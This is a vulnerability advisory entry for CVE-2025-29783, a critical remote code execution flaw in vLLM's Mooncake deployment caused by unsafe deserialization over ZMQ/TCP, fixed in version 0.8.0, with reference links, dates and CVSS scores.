CVE-2025-29783

critical

Description

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. When vLLM is configured to use Mooncake, unsafe deserialization exposed directly over ZMQ/TCP on all network interfaces will allow attackers to execute remote code on distributed hosts. This is a remote code execution vulnerability impacting any deployments using Mooncake to distribute KV across distributed hosts. This vulnerability is fixed in 0.8.0.

References

https://github.com/vllm-project/vllm/security/advisories/GHSA-x3m8-f7g5-qhm7

https://github.com/vllm-project/vllm/pull/14228

https://github.com/vllm-project/vllm/commit/288ca110f68d23909728627d3100e5a8db820aa2

Details

Source: Mitre, NVD

Published: 2025-03-19

Updated: 2025-03-22

Risk Information

CVSS v2

Base Score: 10

Vector: CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C

Severity: Critical

CVSS v3

Base Score: 9

Vector: CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Severity: Critical